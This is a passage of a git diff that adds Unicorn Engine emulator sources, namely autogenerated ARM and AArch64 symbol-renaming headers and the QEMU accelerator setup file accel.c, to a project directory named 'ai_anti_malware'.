tcg_target_qemu_prologue_aarch64eb +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_aarch64eb +#define tcg_temp_alloc tcg_temp_alloc_aarch64eb +#define tcg_temp_free_i32 tcg_temp_free_i32_aarch64eb +#define tcg_temp_free_i64 tcg_temp_free_i64_aarch64eb +#define tcg_temp_free_internal tcg_temp_free_internal_aarch64eb +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_aarch64eb +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_aarch64eb +#define tcg_temp_new_i32 tcg_temp_new_i32_aarch64eb +#define tcg_temp_new_i64 tcg_temp_new_i64_aarch64eb +#define tcg_temp_new_internal tcg_temp_new_internal_aarch64eb +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_aarch64eb +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_aarch64eb +#define tdb_hash tdb_hash_aarch64eb +#define teecr_write teecr_write_aarch64eb +#define teehbr_access teehbr_access_aarch64eb +#define temp_allocate_frame temp_allocate_frame_aarch64eb +#define temp_dead temp_dead_aarch64eb +#define temps_are_copies temps_are_copies_aarch64eb +#define temp_save temp_save_aarch64eb +#define temp_sync temp_sync_aarch64eb +#define tgen_arithi tgen_arithi_aarch64eb +#define tgen_arithr tgen_arithr_aarch64eb +#define thumb2_logic_op thumb2_logic_op_aarch64eb +#define ti925t_initfn ti925t_initfn_aarch64eb +#define tlb_add_large_page tlb_add_large_page_aarch64eb +#define tlb_flush_entry tlb_flush_entry_aarch64eb +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_aarch64eb +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_aarch64eb +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_aarch64eb +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_aarch64eb +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_aarch64eb +#define tlbi_aa64_va_write tlbi_aa64_va_write_aarch64eb +#define tlbiall_is_write tlbiall_is_write_aarch64eb +#define tlbiall_write tlbiall_write_aarch64eb +#define tlbiasid_is_write tlbiasid_is_write_aarch64eb +#define tlbiasid_write tlbiasid_write_aarch64eb +#define tlbimvaa_is_write tlbimvaa_is_write_aarch64eb +#define tlbimvaa_write tlbimvaa_write_aarch64eb +#define tlbimva_is_write tlbimva_is_write_aarch64eb +#define tlbimva_write tlbimva_write_aarch64eb +#define tlb_is_dirty_ram tlb_is_dirty_ram_aarch64eb +#define tlb_protect_code tlb_protect_code_aarch64eb +#define tlb_reset_dirty_range tlb_reset_dirty_range_aarch64eb +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_aarch64eb +#define tlb_set_dirty tlb_set_dirty_aarch64eb +#define tlb_set_dirty1 tlb_set_dirty1_aarch64eb +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_aarch64eb +#define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64eb +#define token_get_type token_get_type_aarch64eb +#define token_get_value token_get_value_aarch64eb +#define token_is_escape token_is_escape_aarch64eb +#define token_is_keyword token_is_keyword_aarch64eb +#define token_is_operator token_is_operator_aarch64eb +#define tokens_append_from_iter tokens_append_from_iter_aarch64eb +#define to_qiv to_qiv_aarch64eb +#define to_qov to_qov_aarch64eb +#define tosa_init tosa_init_aarch64eb +#define tosa_machine_init tosa_machine_init_aarch64eb +#define tswap32 tswap32_aarch64eb +#define tswap64 tswap64_aarch64eb +#define type_class_get_size type_class_get_size_aarch64eb +#define type_get_by_name type_get_by_name_aarch64eb +#define type_get_parent type_get_parent_aarch64eb +#define type_has_parent type_has_parent_aarch64eb +#define type_initialize type_initialize_aarch64eb +#define type_initialize_interface type_initialize_interface_aarch64eb +#define type_is_ancestor type_is_ancestor_aarch64eb +#define type_new type_new_aarch64eb +#define type_object_get_size type_object_get_size_aarch64eb +#define type_register_internal type_register_internal_aarch64eb +#define type_table_add type_table_add_aarch64eb +#define type_table_get type_table_get_aarch64eb +#define type_table_lookup type_table_lookup_aarch64eb +#define uint16_to_float32 uint16_to_float32_aarch64eb +#define uint16_to_float64 uint16_to_float64_aarch64eb +#define uint32_to_float32 uint32_to_float32_aarch64eb +#define uint32_to_float64 uint32_to_float64_aarch64eb +#define uint64_to_float128 uint64_to_float128_aarch64eb +#define uint64_to_float32 uint64_to_float32_aarch64eb +#define uint64_to_float64 uint64_to_float64_aarch64eb +#define unassigned_io_ops unassigned_io_ops_aarch64eb +#define unassigned_io_read unassigned_io_read_aarch64eb +#define unassigned_io_write unassigned_io_write_aarch64eb +#define unassigned_mem_accepts unassigned_mem_accepts_aarch64eb +#define unassigned_mem_ops unassigned_mem_ops_aarch64eb +#define unassigned_mem_read unassigned_mem_read_aarch64eb +#define unassigned_mem_write unassigned_mem_write_aarch64eb +#define update_spsel update_spsel_aarch64eb +#define v6_cp_reginfo v6_cp_reginfo_aarch64eb +#define v6k_cp_reginfo v6k_cp_reginfo_aarch64eb +#define v7_cp_reginfo v7_cp_reginfo_aarch64eb +#define v7mp_cp_reginfo v7mp_cp_reginfo_aarch64eb +#define v7m_pop v7m_pop_aarch64eb +#define v7m_push v7m_push_aarch64eb +#define v8_cp_reginfo v8_cp_reginfo_aarch64eb +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_aarch64eb +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_aarch64eb +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_aarch64eb +#define vapa_cp_reginfo vapa_cp_reginfo_aarch64eb +#define vbar_write vbar_write_aarch64eb +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_aarch64eb +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_aarch64eb +#define vfp_get_fpcr vfp_get_fpcr_aarch64eb +#define vfp_get_fpscr vfp_get_fpscr_aarch64eb +#define vfp_get_fpsr vfp_get_fpsr_aarch64eb +#define vfp_reg_offset vfp_reg_offset_aarch64eb +#define vfp_set_fpcr vfp_set_fpcr_aarch64eb +#define vfp_set_fpscr vfp_set_fpscr_aarch64eb +#define vfp_set_fpsr vfp_set_fpsr_aarch64eb +#define visit_end_implicit_struct visit_end_implicit_struct_aarch64eb +#define visit_end_list visit_end_list_aarch64eb +#define visit_end_struct visit_end_struct_aarch64eb +#define visit_end_union visit_end_union_aarch64eb +#define visit_get_next_type visit_get_next_type_aarch64eb +#define visit_next_list visit_next_list_aarch64eb +#define visit_optional visit_optional_aarch64eb +#define visit_start_implicit_struct visit_start_implicit_struct_aarch64eb +#define visit_start_list visit_start_list_aarch64eb +#define visit_start_struct visit_start_struct_aarch64eb +#define visit_start_union visit_start_union_aarch64eb +#define vmsa_cp_reginfo vmsa_cp_reginfo_aarch64eb +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_aarch64eb +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_aarch64eb +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_aarch64eb +#define vmsa_ttbcr_write vmsa_ttbcr_write_aarch64eb +#define vmsa_ttbr_write vmsa_ttbr_write_aarch64eb +#define write_cpustate_to_list write_cpustate_to_list_aarch64eb +#define write_list_to_cpustate write_list_to_cpustate_aarch64eb +#define write_raw_cp_reg write_raw_cp_reg_aarch64eb +#define X86CPURegister32_lookup X86CPURegister32_lookup_aarch64eb +#define x86_op_defs x86_op_defs_aarch64eb +#define xpsr_read xpsr_read_aarch64eb +#define xpsr_write xpsr_write_aarch64eb +#define xscale_cpar_write xscale_cpar_write_aarch64eb +#define xscale_cp_reginfo xscale_cp_reginfo_aarch64eb +#define ARM64_REGS_STORAGE_SIZE ARM64_REGS_STORAGE_SIZE_aarch64eb +#define arm64_release arm64_release_aarch64eb +#define arm64_reg_reset arm64_reg_reset_aarch64eb +#define arm64_reg_read arm64_reg_read_aarch64eb +#define arm64_reg_write arm64_reg_write_aarch64eb +#define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64eb +#define aarch64_cpu_register_types aarch64_cpu_register_types_aarch64eb +#define helper_udiv64 helper_udiv64_aarch64eb +#define helper_sdiv64 helper_sdiv64_aarch64eb +#define helper_cls64 helper_cls64_aarch64eb +#define helper_cls32 helper_cls32_aarch64eb +#define helper_rbit64 helper_rbit64_aarch64eb +#define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64eb +#define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64eb +#define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64eb +#define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64eb +#define helper_vfp_mulxs helper_vfp_mulxs_aarch64eb +#define helper_vfp_mulxd helper_vfp_mulxd_aarch64eb +#define helper_simd_tbl helper_simd_tbl_aarch64eb +#define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64eb +#define helper_neon_cge_f64 helper_neon_cge_f64_aarch64eb +#define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64eb +#define helper_recpsf_f32 helper_recpsf_f32_aarch64eb +#define helper_recpsf_f64 helper_recpsf_f64_aarch64eb +#define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64eb +#define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64eb +#define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64eb +#define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64eb +#define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64eb +#define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64eb +#define helper_frecpx_f32 helper_frecpx_f32_aarch64eb +#define helper_frecpx_f64 helper_frecpx_f64_aarch64eb +#define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64eb +#define helper_crc32_64 helper_crc32_64_aarch64eb +#define helper_crc32c_64 helper_crc32c_64_aarch64eb +#define aarch64_cpu_do_interrupt aarch64_cpu_do_interrupt_aarch64eb +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c b/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c new file mode 100644 index 0000000..be1e87a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c @@ -0,0 +1,130 @@ +/* + * QEMU System Emulator, accelerator interfaces + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2014 Red Hat Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "sysemu/accel.h" +#include "hw/boards.h" +#include "qemu-common.h" +#include "sysemu/sysemu.h" +#include "qom/object.h" +#include "hw/boards.h" + +// use default size for TCG translated block +#define TCG_TB_SIZE 0 + +static bool tcg_allowed = true; +static int tcg_init(MachineState *ms); +static AccelClass *accel_find(struct uc_struct *uc, const char *opt_name); +static int accel_init_machine(AccelClass *acc, MachineState *ms); +static void tcg_accel_class_init(struct uc_struct *uc, ObjectClass *oc, void *data); + +static int tcg_init(MachineState *ms) +{ + ms->uc->tcg_exec_init(ms->uc, TCG_TB_SIZE * 1024 * 1024); // arch-dependent + return 0; +} + +static const TypeInfo accel_type = { + TYPE_ACCEL, + TYPE_OBJECT, + sizeof(AccelClass), + sizeof(AccelState), +}; + +#define TYPE_TCG_ACCEL ACCEL_CLASS_NAME("tcg") + +static const TypeInfo tcg_accel_type = { + TYPE_TCG_ACCEL, + TYPE_ACCEL, + 0, + 0, + NULL, + NULL, + NULL, + NULL, + NULL, + tcg_accel_class_init, +}; + + +int configure_accelerator(MachineState *ms) +{ + int ret; + bool accel_initialised = false; + AccelClass *acc; + + acc = accel_find(ms->uc, "tcg"); + ret = accel_init_machine(acc, ms); + if (ret < 0) { + fprintf(stderr, "failed to initialize %s: %s\n", + acc->name, + strerror(-ret)); + } else { + accel_initialised = true; + } + + return !accel_initialised; +} + +void register_accel_types(struct uc_struct *uc) +{ + type_register_static(uc, &accel_type); + type_register_static(uc, &tcg_accel_type); +} + +static void tcg_accel_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + AccelClass *ac = ACCEL_CLASS(uc, oc); + ac->name = "tcg"; + ac->init_machine = tcg_init; + ac->allowed = &tcg_allowed; +} + +/* Lookup AccelClass from opt_name. Returns NULL if not found */ +static AccelClass *accel_find(struct uc_struct *uc, const char *opt_name) +{ + char *class_name = g_strdup_printf(ACCEL_CLASS_NAME("%s"), opt_name); + AccelClass *ac = ACCEL_CLASS(uc, object_class_by_name(uc, class_name)); + g_free(class_name); + return ac; +} + +static int accel_init_machine(AccelClass *acc, MachineState *ms) +{ + ObjectClass *oc = OBJECT_CLASS(acc); + const char *cname = object_class_get_name(oc); + AccelState *accel = ACCEL(ms->uc, object_new(ms->uc, cname)); + int ret; + ms->accelerator = accel; + *(acc->allowed) = true; + ret = acc->init_machine(ms); + if (ret < 0) { + ms->accelerator = NULL; + *(acc->allowed) = false; + object_unref(ms->uc, OBJECT(accel)); + } + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h b/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h new file mode 100644 index 0000000..87d0203 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h @@ -0,0 +1,3021 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_ARM_H +#define UNICORN_AUTOGEN_ARM_H +#define arm_release arm_release_arm +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_arm +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_arm +#define use_idiv_instructions_rt use_idiv_instructions_rt_arm +#define tcg_target_deposit_valid tcg_target_deposit_valid_arm +#define helper_power_down helper_power_down_arm +#define check_exit_request check_exit_request_arm +#define address_space_unregister address_space_unregister_arm +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_arm +#define phys_mem_clean phys_mem_clean_arm +#define tb_cleanup tb_cleanup_arm +#define memory_map memory_map_arm +#define memory_map_ptr memory_map_ptr_arm +#define memory_unmap memory_unmap_arm +#define memory_free memory_free_arm +#define free_code_gen_buffer free_code_gen_buffer_arm +#define helper_raise_exception helper_raise_exception_arm +#define tcg_enabled tcg_enabled_arm +#define tcg_exec_init tcg_exec_init_arm +#define memory_register_types memory_register_types_arm +#define cpu_exec_init_all cpu_exec_init_all_arm +#define vm_start vm_start_arm +#define resume_all_vcpus resume_all_vcpus_arm +#define a15_l2ctlr_read a15_l2ctlr_read_arm +#define a64_translate_init a64_translate_init_arm +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_arm +#define aa64_cacheop_access aa64_cacheop_access_arm +#define aa64_daif_access aa64_daif_access_arm +#define aa64_daif_write aa64_daif_write_arm +#define aa64_dczid_read aa64_dczid_read_arm +#define aa64_fpcr_read aa64_fpcr_read_arm +#define aa64_fpcr_write aa64_fpcr_write_arm +#define aa64_fpsr_read aa64_fpsr_read_arm +#define aa64_fpsr_write aa64_fpsr_write_arm +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_arm +#define aa64_zva_access aa64_zva_access_arm +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_arm +#define aarch64_restore_sp aarch64_restore_sp_arm +#define aarch64_save_sp aarch64_save_sp_arm +#define accel_find accel_find_arm +#define accel_init_machine accel_init_machine_arm +#define accel_type accel_type_arm +#define access_with_adjusted_size access_with_adjusted_size_arm +#define add128 add128_arm +#define add16_sat add16_sat_arm +#define add16_usat add16_usat_arm +#define add192 add192_arm +#define add8_sat add8_sat_arm +#define add8_usat add8_usat_arm +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_arm +#define add_cpreg_to_list add_cpreg_to_list_arm +#define addFloat128Sigs addFloat128Sigs_arm +#define addFloat32Sigs addFloat32Sigs_arm +#define addFloat64Sigs addFloat64Sigs_arm +#define addFloatx80Sigs addFloatx80Sigs_arm +#define add_qemu_ldst_label add_qemu_ldst_label_arm +#define address_space_access_valid address_space_access_valid_arm +#define address_space_destroy address_space_destroy_arm +#define address_space_destroy_dispatch address_space_destroy_dispatch_arm +#define address_space_get_flatview address_space_get_flatview_arm +#define address_space_init address_space_init_arm +#define address_space_init_dispatch address_space_init_dispatch_arm +#define address_space_lookup_region address_space_lookup_region_arm +#define address_space_map address_space_map_arm +#define address_space_read address_space_read_arm +#define address_space_rw address_space_rw_arm +#define address_space_translate address_space_translate_arm +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_arm +#define address_space_translate_internal address_space_translate_internal_arm +#define address_space_unmap address_space_unmap_arm +#define address_space_update_topology address_space_update_topology_arm +#define address_space_update_topology_pass address_space_update_topology_pass_arm +#define address_space_write address_space_write_arm +#define addrrange_contains addrrange_contains_arm +#define addrrange_end addrrange_end_arm +#define addrrange_equal addrrange_equal_arm +#define addrrange_intersection addrrange_intersection_arm +#define addrrange_intersects addrrange_intersects_arm +#define addrrange_make addrrange_make_arm +#define adjust_endianness adjust_endianness_arm +#define all_helpers all_helpers_arm +#define alloc_code_gen_buffer alloc_code_gen_buffer_arm +#define alloc_entry alloc_entry_arm +#define always_true always_true_arm +#define arm1026_initfn arm1026_initfn_arm +#define arm1136_initfn arm1136_initfn_arm +#define arm1136_r2_initfn arm1136_r2_initfn_arm +#define arm1176_initfn arm1176_initfn_arm +#define arm11mpcore_initfn arm11mpcore_initfn_arm +#define arm926_initfn arm926_initfn_arm +#define arm946_initfn arm946_initfn_arm +#define arm_ccnt_enabled arm_ccnt_enabled_arm +#define arm_cp_read_zero arm_cp_read_zero_arm +#define arm_cp_reset_ignore arm_cp_reset_ignore_arm +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_arm +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_arm +#define arm_cpu_finalizefn arm_cpu_finalizefn_arm +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_arm +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_arm +#define arm_cpu_initfn arm_cpu_initfn_arm +#define arm_cpu_list arm_cpu_list_arm +#define cpu_loop_exit cpu_loop_exit_arm +#define arm_cpu_post_init arm_cpu_post_init_arm +#define arm_cpu_realizefn arm_cpu_realizefn_arm +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_arm +#define arm_cpu_register_types arm_cpu_register_types_arm +#define cpu_resume_from_signal cpu_resume_from_signal_arm +#define arm_cpus arm_cpus_arm +#define arm_cpu_set_pc arm_cpu_set_pc_arm +#define arm_cp_write_ignore arm_cp_write_ignore_arm +#define arm_current_el arm_current_el_arm +#define arm_dc_feature arm_dc_feature_arm +#define arm_debug_excp_handler arm_debug_excp_handler_arm +#define arm_debug_target_el arm_debug_target_el_arm +#define arm_el_is_aa64 arm_el_is_aa64_arm +#define arm_env_get_cpu arm_env_get_cpu_arm +#define arm_excp_target_el arm_excp_target_el_arm +#define arm_excp_unmasked arm_excp_unmasked_arm +#define arm_feature arm_feature_arm +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_arm +#define gen_intermediate_code gen_intermediate_code_arm +#define gen_intermediate_code_pc gen_intermediate_code_pc_arm +#define arm_gen_test_cc arm_gen_test_cc_arm +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_arm +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_arm +#define arm_handle_psci_call arm_handle_psci_call_arm +#define arm_is_psci_call arm_is_psci_call_arm +#define arm_is_secure arm_is_secure_arm +#define arm_is_secure_below_el3 arm_is_secure_below_el3_arm +#define arm_ldl_code arm_ldl_code_arm +#define arm_lduw_code arm_lduw_code_arm +#define arm_log_exception arm_log_exception_arm +#define arm_reg_read arm_reg_read_arm +#define arm_reg_reset arm_reg_reset_arm +#define arm_reg_write arm_reg_write_arm +#define restore_state_to_opc restore_state_to_opc_arm +#define arm_rmode_to_sf arm_rmode_to_sf_arm +#define arm_singlestep_active arm_singlestep_active_arm +#define tlb_fill tlb_fill_arm +#define tlb_flush tlb_flush_arm +#define tlb_flush_page tlb_flush_page_arm +#define tlb_set_page tlb_set_page_arm +#define arm_translate_init arm_translate_init_arm +#define arm_v7m_class_init arm_v7m_class_init_arm +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_arm +#define ats_access ats_access_arm +#define ats_write ats_write_arm +#define bad_mode_switch bad_mode_switch_arm +#define bank_number bank_number_arm +#define bitmap_zero_extend bitmap_zero_extend_arm +#define bp_wp_matches bp_wp_matches_arm +#define breakpoint_invalidate breakpoint_invalidate_arm +#define build_page_bitmap build_page_bitmap_arm +#define bus_add_child bus_add_child_arm +#define bus_class_init bus_class_init_arm +#define bus_info bus_info_arm +#define bus_unparent bus_unparent_arm +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_arm +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_arm +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_arm +#define call_recip_estimate call_recip_estimate_arm +#define can_merge can_merge_arm +#define capacity_increase capacity_increase_arm +#define ccsidr_read ccsidr_read_arm +#define check_ap check_ap_arm +#define check_breakpoints check_breakpoints_arm +#define check_watchpoints check_watchpoints_arm +#define cho cho_arm +#define clear_bit clear_bit_arm +#define clz32 clz32_arm +#define clz64 clz64_arm +#define cmp_flatrange_addr cmp_flatrange_addr_arm +#define code_gen_alloc code_gen_alloc_arm +#define commonNaNToFloat128 commonNaNToFloat128_arm +#define commonNaNToFloat16 commonNaNToFloat16_arm +#define commonNaNToFloat32 commonNaNToFloat32_arm +#define commonNaNToFloat64 commonNaNToFloat64_arm +#define commonNaNToFloatx80 commonNaNToFloatx80_arm +#define compute_abs_deadline compute_abs_deadline_arm +#define cond_name cond_name_arm +#define configure_accelerator configure_accelerator_arm +#define container_get container_get_arm +#define container_info container_info_arm +#define container_register_types container_register_types_arm +#define contextidr_write contextidr_write_arm +#define core_log_global_start core_log_global_start_arm +#define core_log_global_stop core_log_global_stop_arm +#define core_memory_listener core_memory_listener_arm +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_arm +#define cortex_a15_initfn cortex_a15_initfn_arm +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_arm +#define cortex_a8_initfn cortex_a8_initfn_arm +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_arm +#define cortex_a9_initfn cortex_a9_initfn_arm +#define cortex_m3_initfn cortex_m3_initfn_arm +#define count_cpreg count_cpreg_arm +#define countLeadingZeros32 countLeadingZeros32_arm +#define countLeadingZeros64 countLeadingZeros64_arm +#define cp_access_ok cp_access_ok_arm +#define cpacr_write cpacr_write_arm +#define cpreg_field_is_64bit cpreg_field_is_64bit_arm +#define cp_reginfo cp_reginfo_arm +#define cpreg_key_compare cpreg_key_compare_arm +#define cpreg_make_keylist cpreg_make_keylist_arm +#define cp_reg_reset cp_reg_reset_arm +#define cpreg_to_kvm_id cpreg_to_kvm_id_arm +#define cpsr_read cpsr_read_arm +#define cpsr_write cpsr_write_arm +#define cptype_valid cptype_valid_arm +#define cpu_abort cpu_abort_arm +#define cpu_arm_exec cpu_arm_exec_arm +#define cpu_arm_gen_code cpu_arm_gen_code_arm +#define cpu_arm_init cpu_arm_init_arm +#define cpu_breakpoint_insert cpu_breakpoint_insert_arm +#define cpu_breakpoint_remove cpu_breakpoint_remove_arm +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_arm +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_arm +#define cpu_can_do_io cpu_can_do_io_arm +#define cpu_can_run cpu_can_run_arm +#define cpu_class_init cpu_class_init_arm +#define cpu_common_class_by_name cpu_common_class_by_name_arm +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_arm +#define cpu_common_get_arch_id cpu_common_get_arch_id_arm +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_arm +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_arm +#define cpu_common_has_work cpu_common_has_work_arm +#define cpu_common_initfn cpu_common_initfn_arm +#define cpu_common_noop cpu_common_noop_arm +#define cpu_common_parse_features cpu_common_parse_features_arm +#define cpu_common_realizefn cpu_common_realizefn_arm +#define cpu_common_reset cpu_common_reset_arm +#define cpu_dump_statistics cpu_dump_statistics_arm +#define cpu_exec_init cpu_exec_init_arm +#define cpu_flush_icache_range cpu_flush_icache_range_arm +#define cpu_gen_init cpu_gen_init_arm +#define cpu_get_clock cpu_get_clock_arm +#define cpu_get_real_ticks cpu_get_real_ticks_arm +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_arm +#define cpu_handle_debug_exception cpu_handle_debug_exception_arm +#define cpu_handle_guest_debug cpu_handle_guest_debug_arm +#define cpu_inb cpu_inb_arm +#define cpu_inl cpu_inl_arm +#define cpu_interrupt cpu_interrupt_arm +#define cpu_interrupt_handler cpu_interrupt_handler_arm +#define cpu_inw cpu_inw_arm +#define cpu_io_recompile cpu_io_recompile_arm +#define cpu_is_stopped cpu_is_stopped_arm +#define cpu_ldl_code cpu_ldl_code_arm +#define cpu_ldub_code cpu_ldub_code_arm +#define cpu_lduw_code cpu_lduw_code_arm +#define cpu_memory_rw_debug cpu_memory_rw_debug_arm +#define cpu_mmu_index cpu_mmu_index_arm +#define cpu_outb cpu_outb_arm +#define cpu_outl cpu_outl_arm +#define cpu_outw cpu_outw_arm +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_arm +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_arm +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_arm +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_arm +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_arm +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_arm +#define cpu_physical_memory_map cpu_physical_memory_map_arm +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_arm +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_arm +#define cpu_physical_memory_rw cpu_physical_memory_rw_arm +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_arm +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_arm +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_arm +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_arm +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_arm +#define cpu_register cpu_register_arm +#define cpu_register_types cpu_register_types_arm +#define cpu_restore_state cpu_restore_state_arm +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_arm +#define cpu_single_step cpu_single_step_arm +#define cpu_tb_exec cpu_tb_exec_arm +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_arm +#define cpu_to_be64 cpu_to_be64_arm +#define cpu_to_le32 cpu_to_le32_arm +#define cpu_to_le64 cpu_to_le64_arm +#define cpu_type_info cpu_type_info_arm +#define cpu_unassigned_access cpu_unassigned_access_arm +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_arm +#define cpu_watchpoint_insert cpu_watchpoint_insert_arm +#define cpu_watchpoint_remove cpu_watchpoint_remove_arm +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_arm +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_arm +#define crc32c_table crc32c_table_arm +#define create_new_memory_mapping create_new_memory_mapping_arm +#define csselr_write csselr_write_arm +#define cto32 cto32_arm +#define ctr_el0_access ctr_el0_access_arm +#define ctz32 ctz32_arm +#define ctz64 ctz64_arm +#define dacr_write dacr_write_arm +#define dbgbcr_write dbgbcr_write_arm +#define dbgbvr_write dbgbvr_write_arm +#define dbgwcr_write dbgwcr_write_arm +#define dbgwvr_write dbgwvr_write_arm +#define debug_cp_reginfo debug_cp_reginfo_arm +#define debug_frame debug_frame_arm +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_arm +#define define_arm_cp_regs define_arm_cp_regs_arm +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_arm +#define define_debug_regs define_debug_regs_arm +#define define_one_arm_cp_reg define_one_arm_cp_reg_arm +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_arm +#define deposit32 deposit32_arm +#define deposit64 deposit64_arm +#define deregister_tm_clones deregister_tm_clones_arm +#define device_class_base_init device_class_base_init_arm +#define device_class_init device_class_init_arm +#define device_finalize device_finalize_arm +#define device_get_realized device_get_realized_arm +#define device_initfn device_initfn_arm +#define device_post_init device_post_init_arm +#define device_reset device_reset_arm +#define device_set_realized device_set_realized_arm +#define device_type_info device_type_info_arm +#define disas_arm_insn disas_arm_insn_arm +#define disas_coproc_insn disas_coproc_insn_arm +#define disas_dsp_insn disas_dsp_insn_arm +#define disas_iwmmxt_insn disas_iwmmxt_insn_arm +#define disas_neon_data_insn disas_neon_data_insn_arm +#define 